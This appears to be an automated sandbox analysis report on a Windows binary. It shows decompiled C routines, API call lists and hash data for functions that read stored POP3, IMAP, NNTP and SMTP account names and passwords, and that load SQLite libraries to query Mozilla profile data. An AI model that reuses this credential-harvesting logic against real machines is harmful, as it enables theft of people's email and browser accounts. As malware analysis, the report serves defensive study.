                                                                                0x0040fd39
                                                                                0x0040fd42
                                                                                0x0040fd47
                                                                                0x0040fd4f
                                                                                0x0040fd52
                                                                                0x0040fd55
                                                                                0x0040fd56
                                                                                0x00000000
                                                                                0x0040fd56
                                                                                0x0040fd1f
                                                                                0x0040fd23
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fd25
                                                                                0x0040fd25
                                                                                0x0040fd2c
                                                                                0x00000000
                                                                                0x0040fc6f
                                                                                0x0040fc6f
                                                                                0x0040fc71
                                                                                0x0040fc97
                                                                                0x0040fc97
                                                                                0x0040fc9b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fc8e
                                                                                0x0040fd0c
                                                                                0x0040fca1
                                                                                0x0040fca5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fcb3
                                                                                0x0040fcbb
                                                                                0x0040fcc4
                                                                                0x0040fcc9
                                                                                0x0040fcd4
                                                                                0x0040fce3
                                                                                0x0040fceb
                                                                                0x0040fcec
                                                                                0x0040fcf0
                                                                                0x0040fcfc
                                                                                0x0040fd02
                                                                                0x0040fd03
                                                                                0x00000000
                                                                                0x0040fd03
                                                                                0x0040fc90
                                                                                0x0040fc94
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fc96
                                                                                0x0040fc96
                                                                                0x0040fc9d
                                                                                0x00000000
                                                                                0x0040fc9d
                                                                                0x0040fc60
                                                                                0x0040fc7c
                                                                                0x0040fc82
                                                                                0x0040fc83
                                                                                0x00000000
                                                                                0x0040fc83
                                                                                0x00000000

                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040FC27
                                                                                • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                                                • memcpy.MSVCRT ref: 0040FCB3
                                                                                • atoi.MSVCRT ref: 0040FCC4
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                • API String ID: 1895597112-3210201812
                                                                                • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                                                • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004106BE, Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E004106BE(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				int _t58;
				int _t59;
				int _t60;
				int _t61;
				int _t63;
				void* _t96;
				void* _t99;
				void* _t102;
				void* _t105;
				void* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t123;
				void* _t194;
				void* _t196;
				void* _t201;
				char* _t202;

				_t194 = __edx;
				_t201 = __ecx;
				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
					_t204 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
					_t123 = E00406B74( *_t204);
					_t195 = _t201 + 0xf84;
					E004060D0(0xff, _t201 + 0xf84, _t123);
				}
				_t202 = _t201 + 0x46c;
				if(strcmp(_t202, "POP3_Server") == 0) {
					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t117);
				}
				if(strcmp(_t202, "IMAP_Server") == 0) {
					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t114);
				}
				if(strcmp(_t202, "NNTP_Server") == 0) {
					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t111);
				}
				if(strcmp(_t202, "SMTP_Server") == 0) {
					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1084;
					E004060D0(0xff, _t201 + 0x1084, _t108);
				}
				if(strcmp(_t202, "POP3_User_Name") == 0) {
					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t105);
					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
				}
				if(strcmp(_t202, "IMAP_User_Name") == 0) {
					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t102);
					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
				}
				if(strcmp(_t202, "NNTP_User_Name") == 0) {
					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t99);
					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
				}
				if(strcmp(_t202, "SMTP_User_Name") == 0) {
					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1284;
					E004060D0(0xff, _t201 + 0x1284, _t96);
					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
				}
				_t58 = strcmp(_t202, "POP3_Password2");
				_t214 = _t58;
				if(_t58 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
				}
				_t59 = strcmp(_t202, "IMAP_Password2");
				_t215 = _t59;
				if(_t59 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
				}
				_t60 = strcmp(_t202, "NNTP_Password2");
				_t216 = _t60;
				if(_t60 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
				}
				_t61 = strcmp(_t202, "SMTP_Password2");
				_t217 = _t61;
				if(_t61 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
				}
				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				}
				_t63 = strcmp(_t202, "SMTP_Email_Address");
				if(_t63 == 0) {
					_t203 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
				}
				_push("SMTP_Port");
				_t196 = _t201 + 0x46c;
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x168c) = _t63;
				}
				_push("NNTP_Port");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L35:
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0xf78) = _t63;
				} else {
					_push("IMAP_Port");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L35;
					} else {
						_push("POP3_Port");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L35;
						}
					}
				}
				_push("SMTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x1690) = _t63;
				}
				_push("NNTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L41:
					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				} else {
					_push("IMAP_Secure_Connection");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L41;
					} else {
						_push("POP3_Secure_Connection");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L41;
						}
					}
				}
				return 1;
			}























                                                                                0x004106be
                                                                                0x004106c2
                                                                                0x004106de
                                                                                0x004106e0
                                                                                0x004106f5
                                                                                0x004106fe
                                                                                0x00410704
                                                                                0x0041070a
                                                                                0x0041070f
                                                                                0x00410715
                                                                                0x00410725
                                                                                0x0041072d
                                                                                0x00410733
                                                                                0x00410739
                                                                                0x0041073e
                                                                                0x0041074e
                                                                                0x00410756
                                                                                0x0041075c
                                                                                0x00410762
                                                                                0x00410767
                                                                                0x00410777
                                                                                0x0041077f
                                                                                0x00410785
                                                                                0x0041078b
                                                                                0x00410790
                                                                                0x004107a0
                                                                                0x004107a8
                                                                                0x004107ae
                                                                                0x004107b4
                                                                                0x004107b9
                                                                                0x004107c9
                                                                                0x004107d1
                                                                                0x004107d7
                                                                                0x004107dd
                                                                                0x004107e3
                                                                                0x004107e3
                                                                                0x004107fc
                                                                                0x00410804
                                                                                0x0041080a
                                                                                0x00410810
                                                                                0x00410816
                                                                                0x00410816
                                                                                0x0041082f
                                                                                0x00410837
                                                                                0x0041083d
                                                                                0x00410843
                                                                                0x00410849
                                                                                0x00410849
                                                                                0x00410862
                                                                                0x0041086a
                                                                                0x00410870
                                                                                0x00410876
                                                                                0x0041087c
                                                                                0x0041087c
                                                                                0x0041088c
                                                                                0x00410891
                                                                                0x00410895
                                                                                0x004108aa
                                                                                0x004108aa
                                                                                0x004108b5
                                                                                0x004108ba
                                                                                0x004108be
                                                                                0x004108d3
                                                                                0x004108d3
                                                                                0x004108de
                                                                                0x004108e3
                                                                                0x004108e7
                                                                                0x004108fc
                                                                                0x004108fc
                                                                                0x00410907
                                                                                0x0041090c
                                                                                0x00410910
                                                                                0x00410925
                                                                                0x00410925
                                                                                0x00410939
                                                                                0x0041094d
                                                                                0x00410952
                                                                                0x00410959
                                                                                0x00410962
                                                                                0x00410964
                                                                                0x00410979
                                                                                0x0041098e
                                                                                0x00410993
                                                                                0x00410994
                                                                                0x00410999
                                                                                0x0041099f
                                                                                0x004109a0
                                                                                0x004109a9
                                                                                0x004109b7
                                                                                0x004109bd
                                                                                0x004109bd
                                                                                0x004109c3
                                                                                0x004109c8
                                                                                0x004109c9
                                                                                0x004109d2
                                                                                0x004109f6
                                                                                0x00410a02
                                                                                0x00410a08
                                                                                0x004109d4
                                                                                0x004109d4
                                                                                0x004109d9
                                                                                0x004109da
                                                                                0x004109e3
                                                                                0x00000000
                                                                                0x004109e5
                                                                                0x004109e5
                                                                                0x004109ea
                                                                                0x004109eb
                                                                                0x004109f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004109f4
                                                                                0x004109e3
                                                                                0x00410a0e
                                                                                0x00410a13
                                                                                0x00410a14
                                                                                0x00410a1d
                                                                                0x00410a2b
                                                                                0x00410a31
                                                                                0x00410a31
                                                                                0x00410a37
                                                                                0x00410a3c
                                                                                0x00410a3d
                                                                                0x00410a46
                                                                                0x00410a6a
                                                                                0x00410a7c
                                                                                0x00410a48
                                                                                0x00410a48
                                                                                0x00410a4d
                                                                                0x00410a4e
                                                                                0x00410a57
                                                                                0x00000000
                                                                                0x00410a59
                                                                                0x00410a59
                                                                                0x00410a5e
                                                                                0x00410a5f
                                                                                0x00410a68
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410a68
                                                                                0x00410a57
                                                                                0x00410a89

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcmp$_stricmp$memcpystrlen
                                                                                • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                • API String ID: 1113949926-2499304436
                                                                                • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                                                • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C7CF, Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void _v271;
				char _v272;
				void* __ebx;
				void* __edi;
				int _t64;
				int _t66;
				int _t68;
				int _t69;
				int _t72;
				int _t85;
				void* _t91;
				void* _t132;
				char* _t133;
				char* _t135;
				char* _t137;
				char* _t139;
				intOrPtr _t151;
				int _t153;
				int _t154;
				void* _t155;

				_t132 = __edx;
				_v12 = __ecx;
				_v272 = 0;
				memset( &_v271, 0, 0xff);
				_t133 = "mail.account.account";
				_t64 = strlen(_t133);
				_t148 = _t64;
				_t134 = _a4;
				if(strncmp(_a4, _t133, _t64) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C748(_t134,  &_v16, _t148);
				}
				if(_v8 != 0) {
					_push("identities");
					_push(_v8);
					L004115B2();
					if(_t91 == 0) {
						_t17 = _t155 + 0x604; // 0x604
						E004060D0(0xff, _t17, _a8);
					}
				}
				_t135 = "mail.server";
				_t66 = strlen(_t135);
				_t149 = _t66;
				_t136 = _a4;
				if(strncmp(_a4, _t135, _t66) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C6F3(_t149, _t136,  &_v272);
				}
				if(_v8 != 0) {
					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("username");
					_push(_v8);
					_t154 = _t85;
					L004115B2();
					if(_t85 == 0) {
						_t28 = _t154 + 0x204; // 0x204
						_t85 = E004060D0(0xff, _t28, _a8);
					}
					_push("type");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t31 = _t154 + 0x504; // 0x504
						_t85 = E004060D0(0xff, _t31, _a8);
					}
					_push("hostname");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t34 = _t154 + 0x104; // 0x104
						_t85 = E004060D0(0xff, _t34, _a8);
					}
					_push("port");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t85 = atoi(_a8);
						 *(_t154 + 0x804) = _t85;
					}
					_push("useSecAuth");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_push("true");
						_push(_a8);
						L004115B2();
						if(_t85 == 0) {
							 *((intOrPtr*)(_t154 + 0x808)) = 1;
						}
					}
				}
				_t137 = "mail.identity";
				_t68 = strlen(_t137);
				_t150 = _t68;
				_t138 = _a4;
				_t69 = strncmp(_a4, _t137, _t68);
				if(_t69 != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_t69 = E0040C6F3(_t150, _t138,  &_v272);
					_v8 = _t69;
				}
				if(_v8 != 0) {
					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("useremail");
					_push(_v8);
					_t153 = _t69;
					L004115B2();
					if(_t69 == 0) {
						_t51 = _t153 + 0x404; // 0x404
						_t69 = E004060D0(0xff, _t51, _a8);
					}
					_push("fullname");
					_push(_v8);
					L004115B2();
					if(_t69 == 0) {
						_t54 = _t153 + 4; // 0x4
						_t69 = E004060D0(0xff, _t54, _a8);
					}
				}
				_push("signon.signonfilename");
				_push(_a4);
				L004115B2();
				if(_t69 == 0) {
					_t151 = _v12;
					_t139 = _t151 + 0x245;
					_t152 = _t151 + 0x140;
					_t72 = strlen(_t151 + 0x140);
					_t60 = strlen(_a8) + 1; // 0x1
					if(_t72 + _t60 >= 0x104) {
						 *_t139 = 0;
					} else {
						E004062AD(_t139, _t152, _a8);
					}
				}
				return 1;
			}


























                                                                                0x0040c7cf
                                                                                0x0040c7ea
                                                                                0x0040c7ed
                                                                                0x0040c7f4
                                                                                0x0040c7f9
                                                                                0x0040c7ff
                                                                                0x0040c804
                                                                                0x0040c808
                                                                                0x0040c816
                                                                                0x0040c827
                                                                                0x0040c818
                                                                                0x0040c822
                                                                                0x0040c822
                                                                                0x0040c82f
                                                                                0x0040c863
                                                                                0x0040c868
                                                                                0x0040c86b
                                                                                0x0040c874
                                                                                0x0040c879
                                                                                0x0040c87f
                                                                                0x0040c884
                                                                                0x0040c874
                                                                                0x0040c885
                                                                                0x0040c88b
                                                                                0x0040c890
                                                                                0x0040c894
                                                                                0x0040c8a2
                                                                                0x0040c8b7
                                                                                0x0040c8a4
                                                                                0x0040c8b2
                                                                                0x0040c8b2
                                                                                0x0040c8bf
                                                                                0x0040c8d2
                                                                                0x0040c8d7
                                                                                0x0040c8dc
                                                                                0x0040c8df
                                                                                0x0040c8e1
                                                                                0x0040c8ea
                                                                                0x0040c8ef
                                                                                0x0040c8f5
                                                                                0x0040c8fa
                                                                                0x0040c8fb
                                                                                0x0040c900
                                                                                0x0040c903
                                                                                0x0040c90c
                                                                                0x0040c911
                                                                                0x0040c917
                                                                                0x0040c91c
                                                                                0x0040c91d
                                                                                0x0040c922
                                                                                0x0040c925
                                                                                0x0040c92e
                                                                                0x0040c933
                                                                                0x0040c939
                                                                                0x0040c93e
                                                                                0x0040c93f
                                                                                0x0040c944
                                                                                0x0040c947
                                                                                0x0040c950
                                                                                0x0040c955
                                                                                0x0040c95b
                                                                                0x0040c95b
                                                                                0x0040c961
                                                                                0x0040c966
                                                                                0x0040c969
                                                                                0x0040c972
                                                                                0x0040c974
                                                                                0x0040c979
                                                                                0x0040c97c
                                                                                0x0040c985
                                                                                0x0040c987
                                                                                0x0040c987
                                                                                0x0040c985
                                                                                0x0040c972
                                                                                0x0040c991
                                                                                0x0040c997
                                                                                0x0040c99c
                                                                                0x0040c9a0
                                                                                0x0040c9a4
                                                                                0x0040c9ae
                                                                                0x0040c9c3
                                                                                0x0040c9b0
                                                                                0x0040c9b9
                                                                                0x0040c9be
                                                                                0x0040c9be
                                                                                0x0040c9cb
                                                                                0x0040c9da
                                                                                0x0040c9df
                                                                                0x0040c9e4
                                                                                0x0040c9e7
                                                                                0x0040c9e9
                                                                                0x0040c9f2
                                                                                0x0040c9f7
                                                                                0x0040c9fd
                                                                                0x0040ca02
                                                                                0x0040ca03
                                                                                0x0040ca08
                                                                                0x0040ca0b
                                                                                0x0040ca14
                                                                                0x0040ca19
                                                                                0x0040ca1c
                                                                                0x0040ca21
                                                                                0x0040ca14
                                                                                0x0040ca22
                                                                                0x0040ca27
                                                                                0x0040ca2a
                                                                                0x0040ca33
                                                                                0x0040ca35
                                                                                0x0040ca38
                                                                                0x0040ca3e
                                                                                0x0040ca45
                                                                                0x0040ca54
                                                                                0x0040ca5f
                                                                                0x0040ca70
                                                                                0x0040ca61
                                                                                0x0040ca67
                                                                                0x0040ca6d
                                                                                0x0040ca5f
                                                                                0x0040ca7a

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C7F4
                                                                                • strlen.MSVCRT ref: 0040C7FF
                                                                                • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                                                • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                                                • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                                                • strlen.MSVCRT ref: 0040C88B
                                                                                • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                                                • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                                                • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                                                • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                                                • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                                                • atoi.MSVCRT ref: 0040C955
                                                                                  • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                                                  • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                                                  • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                                                • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                                                • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                                                • strlen.MSVCRT ref: 0040C997
                                                                                • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                                                • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                                                • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                                                • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                                                • strlen.MSVCRT ref: 0040CA45
                                                                                • strlen.MSVCRT ref: 0040CA4F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                • API String ID: 736090197-593045482
                                                                                • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                                                • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F64B, Relevance: 56.1, APIs: 20, Strings: 12, Instructions: 127libraryloaderstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040F64B(intOrPtr* __esi, char* _a4) {
				void _v283;
				char _v284;
				void _v547;
				char _v548;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t68;
				CHAR* _t79;
				intOrPtr* _t81;

				_t81 = __esi;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					L14:
					return 1;
				}
				_v284 = 0;
				memset( &_v283, 0, 0x117);
				if(_a4 == 0) {
					E0040F435( &_v284);
				} else {
					strcpy( &_v284, _a4);
				}
				if(_v284 == 0) {
					_t79 = "sqlite3.dll";
					_t45 = GetModuleHandleA(_t79);
					 *(_t81 + 0x24) = _t45;
					if(_t45 != 0) {
						goto L12;
					}
					_t57 = LoadLibraryA(_t79);
					goto L11;
				} else {
					_v548 = 0;
					memset( &_v547, 0, 0x104);
					strcpy( &_v548,  &_v284);
					strcat( &_v284, "\\sqlite3.dll");
					if(E0040614B( &_v284) == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\mozsqlite3.dll");
					}
					_t68 = GetModuleHandleA( &_v284);
					 *(_t81 + 0x24) = _t68;
					if(_t68 != 0) {
						L12:
						_t46 =  *(_t81 + 0x24);
						if(_t46 == 0) {
							return 0;
						}
						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
						goto L14;
					} else {
						_t57 = LoadLibraryExA( &_v284, 0, 8);
						L11:
						 *(_t81 + 0x24) = _t57;
						goto L12;
					}
				}
			}













                                                                                0x0040f64b
                                                                                0x0040f65b
                                                                                0x0040f7e1
                                                                                0x00000000
                                                                                0x0040f7e3
                                                                                0x0040f66e
                                                                                0x0040f674
                                                                                0x0040f685
                                                                                0x0040f694
                                                                                0x0040f687
                                                                                0x0040f68b
                                                                                0x0040f691
                                                                                0x0040f69f
                                                                                0x0040f741
                                                                                0x0040f747
                                                                                0x0040f74f
                                                                                0x0040f752
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040f755
                                                                                0x00000000
                                                                                0x0040f6a5
                                                                                0x0040f6b2
                                                                                0x0040f6b8
                                                                                0x0040f6cb
                                                                                0x0040f6dc
                                                                                0x0040f6f2
                                                                                0x0040f702
                                                                                0x0040f713
                                                                                0x0040f718
                                                                                0x0040f722
                                                                                0x0040f72a
                                                                                0x0040f72d
                                                                                0x0040f75e
                                                                                0x0040f75e
                                                                                0x0040f763
                                                                                0x00000000
                                                                                0x0040f7ea
                                                                                0x0040f77f
                                                                                0x0040f78b
                                                                                0x0040f798
                                                                                0x0040f7a5
                                                                                0x0040f7b2
                                                                                0x0040f7bf
                                                                                0x0040f7cc
                                                                                0x0040f7d9
                                                                                0x0040f7de
                                                                                0x00000000
                                                                                0x0040f72f
                                                                                0x0040f739
                                                                                0x0040f75b
                                                                                0x0040f75b
                                                                                0x00000000
                                                                                0x0040f75b
                                                                                0x0040f72d

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F674
                                                                                • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                                                • memset.MSVCRT ref: 0040F6B8
                                                                                • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                                                • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                                                • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                                                • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                                                • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                                                • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                                                • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                                                • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
